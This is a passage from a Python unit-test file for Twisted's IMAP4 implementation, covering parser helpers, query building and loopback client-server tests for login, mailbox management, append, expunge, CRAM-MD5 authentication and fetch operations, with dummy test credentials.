['a', ' ', '"', 'b', 'c', ' ', '"', ' ', 'd', 'e'],
[['a', 'b', 'c'], 'd', 'e'],
['a', ['b', 'c', 'd'], 'e'],
['a', 'b', ['c', 'd', 'e']],
['"', 'a', ' ', '"', ['b', 'c', 'd'], '"', ' ', 'e', '"'],
['a', ['"', ' ', 'b', 'c', ' ', ' ', '"'], 'd', 'e'],
]
answers = [
['abcde'],
['a', 'bc ', 'de'],
[['abc'], 'de'],
['a', ['bcd'], 'e'],
['ab', ['cde']],
['a ', ['bcd'], ' e'],
['a', [' bc '], 'de'],
]
for (case, expected) in zip(cases, answers):
self.assertEquals(imap4.collapseStrings(case), expected)
def testParenParser(self):
s = '\r\n'.join(['xx'] * 4)
cases = [
'(BODY.PEEK[HEADER.FIELDS.NOT (subject bcc cc)] {%d}\r\n%s)' % (len(s), s,),
# '(FLAGS (\Seen) INTERNALDATE "17-Jul-1996 02:44:25 -0700" '
# 'RFC822.SIZE 4286 ENVELOPE ("Wed, 17 Jul 1996 02:23:25 -0700 (PDT)" '
# '"IMAP4rev1 WG mtg summary and minutes" '
# '(("Terry Gray" NIL "gray" "cac.washington.edu")) '
# '(("Terry Gray" NIL "gray" "cac.washington.edu")) '
# '(("Terry Gray" NIL "gray" "cac.washington.edu")) '
# '((NIL NIL "imap" "cac.washington.edu")) '
# '((NIL NIL "minutes" "CNRI.Reston.VA.US") '
# '("John Klensin" NIL "KLENSIN" "INFOODS.MIT.EDU")) NIL NIL '
# '"<[email protected]>") '
# 'BODY ("TEXT" "PLAIN" ("CHARSET" "US-ASCII") NIL NIL "7BIT" 3028 92))',
'(FLAGS (\Seen) INTERNALDATE "17-Jul-1996 02:44:25 -0700" '
'RFC822.SIZE 4286 ENVELOPE ("Wed, 17 Jul 1996 02:23:25 -0700 (PDT)" '
'"IMAP4rev1 WG mtg summary and minutes" '
'(("Terry Gray" NIL gray cac.washington.edu)) '
'(("Terry Gray" NIL gray cac.washington.edu)) '
'(("Terry Gray" NIL gray cac.washington.edu)) '
'((NIL NIL imap cac.washington.edu)) '
'((NIL NIL minutes CNRI.Reston.VA.US) '
'("John Klensin" NIL KLENSIN INFOODS.MIT.EDU)) NIL NIL '
'<[email protected]>) '
'BODY (TEXT PLAIN (CHARSET US-ASCII) NIL NIL 7BIT 3028 92))',
]
answers = [
['BODY.PEEK', ['HEADER.FIELDS.NOT', ['subject', 'bcc', 'cc']], s],
['FLAGS', [r'\Seen'], 'INTERNALDATE',
'17-Jul-1996 02:44:25 -0700', 'RFC822.SIZE', '4286', 'ENVELOPE',
['Wed, 17 Jul 1996 02:23:25 -0700 (PDT)',
'IMAP4rev1 WG mtg summary and minutes', [["Terry Gray", None,
"gray", "cac.washington.edu"]], [["Terry Gray", None,
"gray", "cac.washington.edu"]], [["Terry Gray", None,
"gray", "cac.washington.edu"]], [[None, None, "imap",
"cac.washington.edu"]], [[None, None, "minutes",
"CNRI.Reston.VA.US"], ["John Klensin", None, "KLENSIN",
"INFOODS.MIT.EDU"]], None, None,
"<[email protected]>"], "BODY", ["TEXT", "PLAIN",
["CHARSET", "US-ASCII"], None, None, "7BIT", "3028", "92"]],
]
for (case, expected) in zip(cases, answers):
self.assertEquals(imap4.parseNestedParens(case), [expected])
for (case, expected) in zip(answers, cases):
self.assertEquals('(' + imap4.collapseNestedLists(case) + ')', expected)
def testLiterals(self):
cases = [
('({10}\r\n0123456789)', [['0123456789']]),
]
for (case, expected) in cases:
self.assertEquals(imap4.parseNestedParens(case), expected)
def testQueryBuilder(self):
inputs = [
imap4.Query(flagged=1),
imap4.Query(sorted=1, unflagged=1, deleted=1),
imap4.Or(imap4.Query(flagged=1), imap4.Query(deleted=1)),
imap4.Query(before='today'),
imap4.Or(
imap4.Query(deleted=1),
imap4.Query(unseen=1),
imap4.Query(new=1)
),
imap4.Or(
imap4.Not(
imap4.Or(
imap4.Query(sorted=1, since='yesterday', smaller=1000),
imap4.Query(sorted=1, before='tuesday', larger=10000),
imap4.Query(sorted=1, unseen=1, deleted=1, before='today'),
imap4.Not(
imap4.Query(subject='spam')
),
),
),
imap4.Not(
imap4.Query(uid='1:5')
),
)
]
outputs = [
'FLAGGED',
'(DELETED UNFLAGGED)',
'(OR FLAGGED DELETED)',
'(BEFORE "today")',
'(OR DELETED (OR UNSEEN NEW))',
'(OR (NOT (OR (SINCE "yesterday" SMALLER 1000) ' # Continuing
'(OR (BEFORE "tuesday" LARGER 10000) (OR (BEFORE ' # Some more
'"today" DELETED UNSEEN) (NOT (SUBJECT "spam")))))) ' # And more
'(NOT (UID 1:5)))',
]
for (query, expected) in zip(inputs, outputs):
self.assertEquals(query, expected)
def testIdListParser(self):
inputs = [
'1:*',
'5:*',
'1:2,5:*',
'1',
'1,2',
'1,3,5',
'1:10',
'1:10,11',
'1:5,10:20',
'1,5:10',
'1,5:10,15:20',
'1:10,15,20:25',
]
outputs = [
MessageSet(1, None),
MessageSet(5, None),
MessageSet(1, 2, 5, None),
MessageSet(1, 1),
MessageSet(1, 1, 2, 2),
MessageSet(1, 1, 3, 3, 5, 5),
MessageSet(1, 10),
MessageSet(1, 10, 11, 11),
MessageSet(1, 5, 10, 20),
MessageSet(1, 1, 5, 10),
MessageSet(1, 1, 5, 10, 15, 20),
MessageSet(1, 10, 15, 15, 20, 25),
]
lengths = [
sys.maxint, sys.maxint, sys.maxint,
1, 2, 3, 10, 11, 16, 7, 13, 17,
]
for (input, expected) in zip(inputs, outputs):
self.assertEquals(imap4.parseIdList(input), expected)
for (input, expected) in zip(inputs, lengths):
L = len(imap4.parseIdList(input))
self.assertEquals(L, expected,
"len(%r) = %d != %d" % (input, L, expected))
class SimpleMailbox:
flags = ('\\Flag1', 'Flag2', '\\AnotherSysFlag', 'LastFlag')
messages = []
mUID = 0
rw = 1
def __init__(self):
self.listeners = []
self.addListener = self.listeners.append
self.removeListener = self.listeners.remove
def getFlags(self):
return self.flags
def getUIDValidity(self):
return 42
def getUIDNext(self):
return len(self.messages) + 1
def getMessageCount(self):
return 9
def getRecentCount(self):
return 3
def getUnseenCount(self):
return 4
def isWriteable(self):
return self.rw
def destroy(self):
pass
def getHierarchicalDelimiter(self):
return '/'
def requestStatus(self, names):
r = {}
if 'MESSAGES' in names:
r['MESSAGES'] = self.getMessageCount()
if 'RECENT' in names:
r['RECENT'] = self.getRecentCount()
if 'UIDNEXT' in names:
r['UIDNEXT'] = self.getMessageCount() + 1
if 'UIDVALIDITY' in names:
r['UIDVALIDITY'] = self.getUID()
if 'UNSEEN' in names:
r['UNSEEN'] = self.getUnseenCount()
return defer.succeed(r)
def addMessage(self, message, flags, date = None):
self.messages.append((message, flags, date, self.mUID))
self.mUID += 1
return defer.succeed(None)
def expunge(self):
delete = []
for i in self.messages:
if '\\Deleted' in i[1]:
delete.append(i)
for i in delete:
self.messages.remove(i)
return [i[3] for i in delete]
class Account(imap4.MemoryAccount):
def _emptyMailbox(self, name, id):
return SimpleMailbox()
def select(self, name, rw=1):
mbox = imap4.MemoryAccount.select(self, name)
if mbox is not None:
mbox.rw = rw
return mbox
class SimpleServer(imap4.IMAP4Server):
def authenticateLogin(self, username, password):
if username == 'testuser' and password == 'password-test':
return self.theAccount
return None
class SimpleClient(imap4.IMAP4Client):
def __init__(self, deferred):
imap4.IMAP4Client.__init__(self)
self.deferred = deferred
self.events = []
def connectionMade(self):
self.deferred.callback(None)
def modeChanged(self, writeable):
self.events.append(['modeChanged', writeable])
self.transport.loseConnection()
def flagsChanged(self, newFlags):
self.events.append(['flagsChanged', newFlags])
self.transport.loseConnection()
def newMessages(self, exists, recent):
self.events.append(['newMessages', exists, recent])
self.transport.loseConnection()
class IMAP4HelperMixin:
def setUp(self):
d = defer.Deferred()
self.server = SimpleServer()
self.client = SimpleClient(d)
self.connected = d
SimpleMailbox.messages = []
theAccount = Account('testuser')
theAccount.mboxType = SimpleMailbox
SimpleServer.theAccount = theAccount
def tearDown(self):
del self.server
del self.client
del self.connected
def _cbStopClient(self, ignore):
self.client.transport.loseConnection()
def _ebGeneral(self, failure):
self.client.transport.loseConnection()
self.server.transport.loseConnection()
failure.printTraceback(open('failure.log', 'w'))
failure.printTraceback()
raise failure.value
def loopback(self):
loopback.loopback(self.server, self.client)
class IMAP4ServerTestCase(IMAP4HelperMixin, unittest.TestCase):
def testCapability(self):
caps = {}
def getCaps():
def gotCaps(c):
caps.update(c)
self.server.transport.loseConnection()
return self.client.getCapabilities().addCallback(gotCaps)
self.connected.addCallback(strip(getCaps)).addErrback(self._ebGeneral)
self.loopback()
refCaps = self.server.CAPABILITIES.copy()
refCaps['IMAP4rev1'] = None
self.assertEquals(refCaps, caps)
def testLogout(self):
self.loggedOut = 0
def logout():
def setLoggedOut():
self.loggedOut = 1
self.client.logout().addCallback(strip(setLoggedOut))
self.connected.addCallback(strip(logout)).addErrback(self._ebGeneral)
self.loopback()
self.assertEquals(self.loggedOut, 1)
def testNoop(self):
self.responses = None
def noop():
def setResponses(responses):
self.responses = responses
self.server.transport.loseConnection()
self.client.noop().addCallback(setResponses)
self.connected.addCallback(strip(noop)).addErrback(self._ebGeneral)
self.loopback()
self.assertEquals(self.responses, [])
def testLogin(self):
def login():
d = self.client.login('testuser', 'password-test')
d.addCallback(self._cbStopClient)
self.connected.addCallback(strip(login)).addErrback(self._ebGeneral)
self.loopback()
self.assertEquals(self.server.account, SimpleServer.theAccount)
self.assertEquals(self.server.state, 'auth')
def testFailedLogin(self):
def login():
d = self.client.login('testuser', 'wrong-password')
d.addBoth(self._cbStopClient)
self.connected.addCallback(strip(login)).addErrback(self._ebGeneral)
self.loopback()
self.assertEquals(self.server.account, None)
self.assertEquals(self.server.state, 'unauth')
def testSelect(self):
SimpleServer.theAccount.addMailbox('test-mailbox')
self.selectedArgs = None
def login():
return self.client.login('testuser', 'password-test')
def select():
def selected(args):
self.selectedArgs = args
self._cbStopClient(None)
d = self.client.select('test-mailbox')
d.addCallback(selected)
return d
d = self.connected.addCallback(strip(login))
d.addCallback(strip(select))
d.addErrback(self._ebGeneral)
self.loopback()
mbox = SimpleServer.theAccount.mailboxes['TEST-MAILBOX']
self.assertEquals(self.server.mbox, mbox)
self.assertEquals(self.selectedArgs, {
'EXISTS': 9, 'RECENT': 3, 'UIDVALIDITY': 42,
'FLAGS': ('\\Flag1', 'Flag2', '\\AnotherSysFlag', 'LastFlag'),
'READ-WRITE': 1
})
def testExamine(self):
SimpleServer.theAccount.addMailbox('test-mailbox')
self.examinedArgs = None
def login():
return self.client.login('testuser', 'password-test')
def examine():
def examined(args):
self.examinedArgs = args
self._cbStopClient(None)
d = self.client.examine('test-mailbox')
d.addCallback(examined)
return d
d = self.connected.addCallback(strip(login))
d.addCallback(strip(examine))
d.addErrback(self._ebGeneral)
self.loopback()
mbox = SimpleServer.theAccount.mailboxes['TEST-MAILBOX']
self.assertEquals(self.server.mbox, mbox)
self.assertEquals(self.examinedArgs, {
'EXISTS': 9, 'RECENT': 3, 'UIDVALIDITY': 42,
'FLAGS': ('\\Flag1', 'Flag2', '\\AnotherSysFlag', 'LastFlag'),
'READ-WRITE': 0
})
def testCreate(self):
succeed = ('testbox', 'test/box', 'test/', 'test/box/box', 'INBOX')
fail = ('testbox', 'test/box')
def cb(): self.result.append(1)
def eb(failure): self.result.append(0)
def login():
return self.client.login('testuser', 'password-test')
def create():
for name in succeed + fail:
d = self.client.create(name)
d.addCallback(strip(cb)).addErrback(eb)
d.addCallbacks(self._cbStopClient, self._ebGeneral)
self.result = []
d = self.connected.addCallback(strip(login)).addCallback(strip(create))
self.loopback()
self.assertEquals(self.result, [1] * len(succeed) + [0] * len(fail))
mbox = SimpleServer.theAccount.mailboxes.keys()
answers = ['inbox', 'testbox', 'test/box', 'test', 'test/box/box']
mbox.sort()
answers.sort()
self.assertEquals(mbox, [a.upper() for a in answers])
def testDelete(self):
SimpleServer.theAccount.addMailbox('delete/me')
def login():
return self.client.login('testuser', 'password-test')
def delete():
return self.client.delete('delete/me')
d = self.connected.addCallbacks(strip(login))
d.addCallbacks(strip(delete), self._ebGeneral)
d.addCallbacks(self._cbStopClient, self._ebGeneral)
self.loopback()
self.assertEquals(SimpleServer.theAccount.mailboxes.keys(), [])
def testNonExistentDelete(self):
def login():
return self.client.login('testuser', 'password-test')
def delete():
return self.client.delete('delete/me')
def deleteFailed(failure):
self.failure = failure
self.failure = None
d = self.connected.addCallback(strip(login))
d.addCallback(strip(delete)).addErrback(deleteFailed)
d.addCallbacks(self._cbStopClient, self._ebGeneral)
self.loopback()
self.assertEquals(str(self.failure.value), 'No such mailbox')
def testIllegalDelete(self):
m = SimpleMailbox()
m.flags = (r'\Noselect',)
SimpleServer.theAccount.addMailbox('delete', m)
SimpleServer.theAccount.addMailbox('delete/me')
def login():
return self.client.login('testuser', 'password-test')
def delete():
return self.client.delete('delete')
def deleteFailed(failure):
self.failure = failure
self.failure = None
d = self.connected.addCallback(strip(login))
d.addCallback(strip(delete)).addErrback(deleteFailed)
d.addCallbacks(self._cbStopClient, self._ebGeneral)
self.loopback()
self.assertEquals(str(self.failure.value), "Hierarchically inferior mailboxes exist and \\Noselect is set")
def testRename(self):
SimpleServer.theAccount.addMailbox('oldmbox')
def login():
return self.client.login('testuser', 'password-test')
def rename():
return self.client.rename('oldmbox', 'newname')
d = self.connected.addCallback(strip(login))
d.addCallbacks(strip(rename), self._ebGeneral)
d.addCallbacks(self._cbStopClient, self._ebGeneral)
self.loopback()
self.assertEquals(SimpleServer.theAccount.mailboxes.keys(), ['NEWNAME'])
def testHierarchicalRename(self):
SimpleServer.theAccount.create('oldmbox/m1')
SimpleServer.theAccount.create('oldmbox/m2')
def login():
return self.client.login('testuser', 'password-test')
def rename():
return self.client.rename('oldmbox', 'newname')
d = self.connected.addCallback(strip(login))
d.addCallbacks(strip(rename), self._ebGeneral)
d.addCallbacks(self._cbStopClient, self._ebGeneral)
self.loopback()
mboxes = SimpleServer.theAccount.mailboxes.keys()
expected = ['newname', 'newname/m1', 'newname/m2']
mboxes.sort()
self.assertEquals(mboxes, [s.upper() for s in expected])
def testSubscribe(self):
def login():
return self.client.login('testuser', 'password-test')
def subscribe():
return self.client.subscribe('this/mbox')
d = self.connected.addCallback(strip(login))
d.addCallbacks(strip(subscribe), self._ebGeneral)
d.addCallbacks(self._cbStopClient, self._ebGeneral)
self.loopback()
self.assertEquals(SimpleServer.theAccount.subscriptions, ['THIS/MBOX'])
def testUnsubscribe(self):
SimpleServer.theAccount.subscriptions = ['THIS/MBOX', 'THAT/MBOX']
def login():
return self.client.login('testuser', 'password-test')
def unsubscribe():
return self.client.unsubscribe('this/mbox')
d = self.connected.addCallback(strip(login))
d.addCallbacks(strip(unsubscribe), self._ebGeneral)
d.addCallbacks(self._cbStopClient, self._ebGeneral)
self.loopback()
self.assertEquals(SimpleServer.theAccount.subscriptions, ['THAT/MBOX'])
def _listSetup(self, f):
SimpleServer.theAccount.addMailbox('root/subthing')
SimpleServer.theAccount.addMailbox('root/another-thing')
SimpleServer.theAccount.addMailbox('non-root/subthing')
def login():
return self.client.login('testuser', 'password-test')
def listed(answers):
self.listed = answers
self.listed = None
d = self.connected.addCallback(strip(login))
d.addCallbacks(strip(f), self._ebGeneral)
d.addCallbacks(listed, self._ebGeneral)
d.addCallbacks(self._cbStopClient, self._ebGeneral)
self.loopback()
return self.listed
def testList(self):
def list():
return self.client.list('root', '%')
listed = self._listSetup(list)
self.assertEquals(
sortNest(listed),
sortNest([
(SimpleMailbox.flags, "/", "ROOT/SUBTHING"),
(SimpleMailbox.flags, "/", "ROOT/ANOTHER-THING")
])
)
def testLSub(self):
SimpleServer.theAccount.subscribe('ROOT/SUBTHING')
def lsub():
return self.client.lsub('root', '%')
listed = self._listSetup(lsub)
self.assertEquals(listed, [(SimpleMailbox.flags, "/", "ROOT/SUBTHING")])
def testStatus(self):
SimpleServer.theAccount.addMailbox('root/subthing')
def login():
return self.client.login('testuser', 'password-test')
def status():
return self.client.status('root/subthing', 'MESSAGES', 'UIDNEXT', 'UNSEEN')
def statused(result):
self.statused = result
self.statused = None
d = self.connected.addCallback(strip(login))
d.addCallbacks(strip(status), self._ebGeneral)
d.addCallbacks(statused, self._ebGeneral)
d.addCallbacks(self._cbStopClient, self._ebGeneral)
self.loopback()
self.assertEquals(
self.statused,
{'MESSAGES': 9, 'UIDNEXT': '10', 'UNSEEN': 4}
)
def testFailedStatus(self):
def login():
return self.client.login('testuser', 'password-test')
def status():
return self.client.status('root/nonexistent', 'MESSAGES', 'UIDNEXT', 'UNSEEN')
def statused(result):
self.statused = result
def failed(failure):
self.failure = failure
self.statused = self.failure = None
d = self.connected.addCallback(strip(login))
d.addCallbacks(strip(status), self._ebGeneral)
d.addCallbacks(statused, failed)
d.addCallbacks(self._cbStopClient, self._ebGeneral)
self.loopback()
self.assertEquals(
self.statused, None
)
self.assertEquals(
self.failure.value.args,
('Could not open mailbox',)
)
def testFullAppend(self):
infile = util.sibpath(__file__, 'rfc822.message')
message = open(infile)
SimpleServer.theAccount.addMailbox('root/subthing')
def login():
return self.client.login('testuser', 'password-test')
def append():
return self.client.append(
'root/subthing',
message,
('\\SEEN', '\\DELETED'),
'Tue, 17 Jun 2003 11:22:16 -0600 (MDT)',
)
d = self.connected.addCallback(strip(login))
d.addCallbacks(strip(append), self._ebGeneral)
d.addCallbacks(self._cbStopClient, self._ebGeneral)
self.loopback()
mb = SimpleServer.theAccount.mailboxes['ROOT/SUBTHING']
self.assertEquals(1, len(mb.messages))
self.assertEquals(
(['\\SEEN', '\\DELETED'], 'Tue, 17 Jun 2003 11:22:16 -0600 (MDT)', 0),
mb.messages[0][1:]
)
self.assertEquals(open(infile).read(), mb.messages[0][0].getvalue())
def testPartialAppend(self):
infile = util.sibpath(__file__, 'rfc822.message')
message = open(infile)
SimpleServer.theAccount.addMailbox('PARTIAL/SUBTHING')
def login():
return self.client.login('testuser', 'password-test')
def append():
message = file(infile)
continuation = defer.Deferred()
continuation.addCallback(self.client._IMAP4Client__cbContinueAppend, message)
continuation.addErrback(self.client._IMAP4Client__ebContinueAppend)
return self.client.sendCommand(
imap4.Command(
'APPEND',
'PARTIAL/SUBTHING (\\SEEN) "Right now" {%d}' % os.path.getsize(infile),
continuation
)
).addCallback(self.client._IMAP4Client__cbAppend)
d = self.connected.addCallback(strip(login))
d.addCallbacks(strip(append), self._ebGeneral)
d.addCallbacks(self._cbStopClient, self._ebGeneral)
d.setTimeout(5)
self.loopback()
mb = SimpleServer.theAccount.mailboxes['PARTIAL/SUBTHING']
self.assertEquals(1, len(mb.messages))
self.assertEquals(
(['\\SEEN'], 'Right now', 0),
mb.messages[0][1:]
)
self.assertEquals(open(infile).read(), mb.messages[0][0].getvalue())
def testCheck(self):
SimpleServer.theAccount.addMailbox('root/subthing')
def login():
return self.client.login('testuser', 'password-test')
def select():
return self.client.select('root/subthing')
def check():
return self.client.check()
d = self.connected.addCallback(strip(login))
d.addCallbacks(strip(select), self._ebGeneral)
d.addCallbacks(strip(check), self._ebGeneral)
d.addCallbacks(self._cbStopClient, self._ebGeneral)
self.loopback()
# Okay, that was fun
def testClose(self):
m = SimpleMailbox()
m.messages = [
('Message 1', ('\\Deleted', 'AnotherFlag'), None, 0),
('Message 2', ('AnotherFlag',), None, 1),
('Message 3', ('\\Deleted',), None, 2),
]
SimpleServer.theAccount.addMailbox('mailbox', m)
def login():
return self.client.login('testuser', 'password-test')
def select():
return self.client.select('mailbox')
def close():
return self.client.close()
d = self.connected.addCallback(strip(login))
d.addCallbacks(strip(select), self._ebGeneral)
d.addCallbacks(strip(close), self._ebGeneral)
d.addCallbacks(self._cbStopClient, self._ebGeneral)
self.loopback()
self.assertEquals(len(m.messages), 1)
self.assertEquals(m.messages[0], ('Message 2', ('AnotherFlag',), None, 1))
def testExpunge(self):
m = SimpleMailbox()
m.messages = [
('Message 1', ('\\Deleted', 'AnotherFlag'), None, 0),
('Message 2', ('AnotherFlag',), None, 1),
('Message 3', ('\\Deleted',), None, 2),
]
SimpleServer.theAccount.addMailbox('mailbox', m)
def login():
return self.client.login('testuser', 'password-test')
def select():
return self.client.select('mailbox')
def expunge():
return self.client.expunge()
def expunged(results):
self.results = results
self.results = None
d = self.connected.addCallback(strip(login))
d.addCallbacks(strip(select), self._ebGeneral)
d.addCallbacks(strip(expunge), self._ebGeneral)
d.addCallbacks(expunged, self._ebGeneral)
d.addCallbacks(self._cbStopClient, self._ebGeneral)
self.loopback()
self.assertEquals(len(m.messages), 1)
self.assertEquals(m.messages[0], ('Message 2', ('AnotherFlag',), None, 1))
self.assertEquals(self.results, [0, 2])
class DummyService(service.Service):
def __init__(self, authorizer):
service.Service.__init__(self, 'MessageStorage', authorizer=authorizer)
class AuthenticatorTestCase(IMAP4HelperMixin, unittest.TestCase):
def setUp(self):
IMAP4HelperMixin.setUp(self)
services = _AbstractServiceCollection()
auth = authorizer.DefaultAuthorizer(services)
service = DummyService(auth)
services.addService(service)
ident = imap4.CramMD5Identity('testuser', auth)
ident.setPassword('secret')
a = Account('testuser')
service.addPerspective(a)
ident.addKeyForPerspective(a)
auth.addIdentity(ident)
sAuth = imap4.CramMD5ServerAuthenticator('test-domain.com', auth)
cAuth = imap4.CramMD5ClientAuthenticator('testuser')
self.client.registerAuthenticator(cAuth)
self.server.registerChallenger(sAuth)
self.authenticated = 0
self.account = a
def testCramMD5(self):
def auth():
return self.client.authenticate('secret')
def authed():
self.authenticated = 1
d = self.connected.addCallback(strip(auth))
d.addCallbacks(strip(authed), self._ebGeneral)
d.addCallbacks(self._cbStopClient, self._ebGeneral)
self.loopback()
self.assertEquals(self.authenticated, 1)
self.assertEquals(self.server.account, self.account)
def testFailedCramMD5(self):
def misauth():
return self.client.authenticate('not the secret')
def authed():
self.authenticated = 1
def misauthed():
self.authenticated = -1
d = self.connected.addCallback(strip(misauth))
d.addCallbacks(strip(authed), strip(misauthed))
d.addCallbacks(self._cbStopClient, self._ebGeneral)
self.loopback()
self.assertEquals(self.authenticated, -1)
self.assertEquals(self.server.account, None)
class UnsolicitedResponseTestCase(IMAP4HelperMixin, unittest.TestCase):
def testReadWrite(self):
def login():
return self.client.login('testuser', 'password-test')
def loggedIn():
self.server.modeChanged(1)
d = self.connected.addCallback(strip(login))
d.addCallback(strip(loggedIn)).addErrback(self._ebGeneral)
self.loopback()
E = self.client.events
self.assertEquals(E, [['modeChanged', 1]])
def testReadOnly(self):
def login():
return self.client.login('testuser', 'password-test')
def loggedIn():
self.server.modeChanged(0)
d = self.connected.addCallback(strip(login))
d.addCallback(strip(loggedIn)).addErrback(self._ebGeneral)
self.loopback()
E = self.client.events
self.assertEquals(E, [['modeChanged', 0]])
def testFlagChange(self):
flags = {
1: ['\\Answered', '\\Deleted'],
5: [],
10: ['\\Recent']
}
def login():
return self.client.login('testuser', 'password-test')
def loggedIn():
self.server.flagsChanged(flags)
d = self.connected.addCallback(strip(login))
d.addCallback(strip(loggedIn)).addErrback(self._ebGeneral)
self.loopback()
E = self.client.events
expect = [['flagsChanged', {x[0]: x[1]}] for x in flags.items()]
E.sort()
expect.sort()
self.assertEquals(E, expect)
def testNewMessages(self):
def login():
return self.client.login('testuser', 'password-test')
def loggedIn():
self.server.newMessages(10, None)
d = self.connected.addCallback(strip(login))
d.addCallback(strip(loggedIn)).addErrback(self._ebGeneral)
self.loopback()
E = self.client.events
self.assertEquals(E, [['newMessages', 10, None]])
def testNewRecentMessages(self):
def login():
return self.client.login('testuser', 'password-test')
def loggedIn():
self.server.newMessages(None, 10)
d = self.connected.addCallback(strip(login))
d.addCallback(strip(loggedIn)).addErrback(self._ebGeneral)
self.loopback()
E = self.client.events
self.assertEquals(E, [['newMessages', None, 10]])
def testNewMessagesAndRecent(self):
def login():
return self.client.login('testuser', 'password-test')
def loggedIn():
self.server.newMessages(20, 10)
d = self.connected.addCallback(strip(login))
d.addCallback(strip(loggedIn)).addErrback(self._ebGeneral)
self.loopback()
E = self.client.events
self.assertEquals(E, [['newMessages', 20, None], ['newMessages', None, 10]])
class StringTransport:
disconnecting = 0
def __init__(self):
self.io = StringIO()
def write(self, data):
self.io.write(data)
def writeSequence(self, data):
self.io.write(''.join(data))
def loseConnection(self):
pass
def getPeer(self):
return ('StringIO', repr(self.io))
def getHost(self):
return ('StringIO', repr(self.io))
class HandCraftedTestCase(unittest.TestCase):
def testTrailingLiteral(self):
transport = StringTransport()
c = imap4.IMAP4Client()
c.makeConnection(transport)
c.lineReceived('* OK SERVER BANNER')
d = c.login('blah', 'blah')
c.dataReceived('0001 OK CAPABILITY\r\n0002 OK LOGIN\r\n')
self.failUnless(unittest.deferredResult(d))
d = c.select('inbox')
c.lineReceived('0003 OK SELECT')
self.failUnless(unittest.deferredResult(d))
d = c.fetchMessage('1')
c.dataReceived('* 1 FETCH (RFC822 {10}\r\n0123456789\r\n RFC822.SIZE 10)\r\n')
c.dataReceived('0004 OK FETCH\r\n')
self.failUnless(unittest.deferredResult(d))
class FakeyServer(imap4.IMAP4Server):
state = 'select'
timeout = None
def sendServerGreeting(self):
pass
class FetchSearchStoreCopyTestCase(unittest.TestCase, IMAP4HelperMixin):
def setUp(self):
self.expected = self.result = None
self.server_received_query = None
self.server_received_uid = None
self.server_received_parts = None
self.server_received_messages = None
self.server = imap4.IMAP4Server()
self.server.state = 'select'
self.server.mbox = self
self.connected = defer.Deferred()
self.client = SimpleClient(self.connected)
def search(self, query, uid):
self.server_received_query = query
self.server_received_uid = uid
return self.expected
def _searchWork(self, uid):
def search():
return self.client.search(self.query, uid=uid)
def result(R):
self.result = R
self.connected.addCallback(strip(search)
).addCallback(result
).addCallback(self._cbStopClient
).addErrback(self._ebGeneral)
loopback.loopbackTCP(self.server, self.client)
# Ensure no short-circuiting wierdness is going on
self.failIf(self.result is self.expected)
self.assertEquals(self.result, self.expected)
self.assertEquals(self.uid, self.server_received_uid)
self.assertEquals(
imap4.parseNestedParens(self.query),
self.server_received_query
)
def testSearch(self):
self.query = imap4.Or(
imap4.Query(header=('subject', 'substring')),
imap4.Query(larger=1024, smaller=4096),
)
self.expected = [1, 4, 5, 7]
self.uid = 0
self._searchWork(0)
def testUIDSearch(self):
self.query = imap4.Or(
imap4.Query(header=('subject', 'substring')),
imap4.Query(larger=1024, smaller=4096),
)
self.uid = 1
self.expected = [1, 2, 3]
self._searchWork(1)
def fetch(self, messages, parts, uid):
self.server_received_uid = uid
self.server_received_parts = parts
self.server_received_messages = str(messages)
return self.expected
def _fetchWork(self, fetch):
def result(R):
self.result = R
self.connected.addCallback(strip(fetch)
).addCallback(result
).addCallback(self._cbStopClient
).addErrback(self._ebGeneral)
loopback.loopbackTCP(self.server, self.client)
# Ensure no short-circuiting wierdness is going on
self.failIf(self.result is self.expected)
self.parts and self.parts.sort()
self.server_received_parts and self.server_received_parts.sort()
self.assertEquals(self.result, self.expected)
self.assertEquals(self.uid, self.server_received_uid)
self.assertEquals(self.parts, self.server_received_parts)
self.assertEquals(self.messages, self.server_received_messages)
def testFetchUID(self):
def fetch():
return self.client.fetchUID(self.messages)
self.expected = {
1: {'UID': '10'},
2: {'UID': '20'},
3: {'UID': '21'},
4: {'UID': '101'},
101: {'UID': '202'}
}
self.messages = '1:56,60,103:109'
self.parts = ['UID']
self.uid = 0
self._fetchWork(fetch)
def testFetchFlags(self, uid=0):
def fetch():
return self.client.fetchFlags(self.messages, uid=uid)
self.expected = {
32: {'FLAGS': ['\\RECENT']},
64: {'FLAGS': ['\\DELETED', '\\UNSEEN']},
128: {'FLAGS': []}
}
self.messages = '5:102,202:*'
self.parts = ['FLAGS']
self.uid = uid
self._fetchWork(fetch)
def testFetchFlagsUID(self):
self.testFetchFlags(1)
def testFetchInternalDate(self, uid=0):
def fetch():
return self.client.fetchInternalDate(self.messages, uid=uid)
self.expected = {
10: {'INTERNALDATE': '20-Oct-1981 03:25:19 -0500'},
20: {'INTERNALDATE': '15-Feb-1985 01:30:05 +0900'},
21: {'INTERNALDATE': '01-Jun-1992 13:51:48 -0100'},
}
self.messages = '1,69,72,103'
self.parts = ['INTERNALDATE']
self.uid = uid
self._fetchWork(fetch)
def testFetchInternalDateUID(self):
self.testFetchInternalDate(1)
def testFetchEnvelope(self, uid=0):
def fetch():
return self.client.fetchEnvelope(self.messages, uid=uid)
self.expected = {
102: {'ENVELOPE': 'some data'},
}
self.messages = '72:102,103'
self.parts = ['ENVELOPE']
self.uid = uid
self._fetchWork(fetch)
def testFetchEnvelopeUID(self):
self.testFetchEnvelope(1)
def testFetchBodyStructure(self, uid=0):
def fetch():
return self.client.fetchBodyStructure(self.messages, uid=uid)
self.expected = {
103: {'BODYSTRUCTURE': 'lots of gross information'},
}
self.messages = '1:*'
self.parts = ['BODYSTRUCTURE']
self.uid = uid
self._fetchWork(fetch)
def testFetchBodyStructureUID(self):
self.testFetchBodyStructure(1)
def testFetchSimplifiedBody(self, uid=0):
def fetch():
return self.client.fetchSimplifiedBody(self.messages, uid=uid)
self.expected = {
2: {'BODY': 'XXX fill this in bucko'},
}
self.messages = '2,5,10'
self.parts = ['BODY']
self.uid = uid
self._fetchWork(fetch)
def testFetchSimplifiedBodyUID(self):
self.testFetchSimplifiedBody(1)
def testFetchMessage(self, uid=0):
def fetch():
return self.client.fetchMessage(self.messages, uid=uid)
self.expected = {
29281: {'BODY': 'XXX fill this in bucko'},
}
self.messages = '19884,1,23872,666:777'
self.parts = ['RFC822']
self.uid = uid
self._fetchWork(fetch)
def testFetchMessageUID(self):
self.testFetchMessage(1)
def testFetchHeaders(self, uid=0):
def fetch():
return self.client.fetchHeaders(self.messages, uid=uid)
self.expected = {
19: {'RFC822HEADER': 'XXX put some headers here'},
}
self.messages = '2:3,4:5,6:*'
self.parts = ['RFC822HEADER']
